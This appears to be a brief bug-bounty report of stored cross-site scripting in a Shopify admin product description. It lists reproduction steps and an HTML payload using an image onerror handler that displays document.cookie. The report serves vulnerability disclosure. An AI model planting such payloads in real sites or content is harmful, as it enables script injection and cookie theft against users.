xss triggered in "myshopify.com/admin/product"

I tried to make a product description and add the xss script in the paragraph. ## steps for reproduction 1. create a new product 2. enter xss in the product description paragraph, such as; `<div align =" center "data-mce-fragment =" 1 "> <img src = x onerror = prompt (document.cookie)> <h4 dir = "ltr" data-mce-fragment = "1"> <span style = "text-decoration: underline; color: # ff2a00;"> <em> <strong> (name_product) </strong></em></span> </h4> </div> `` ## Impact xss can be triggered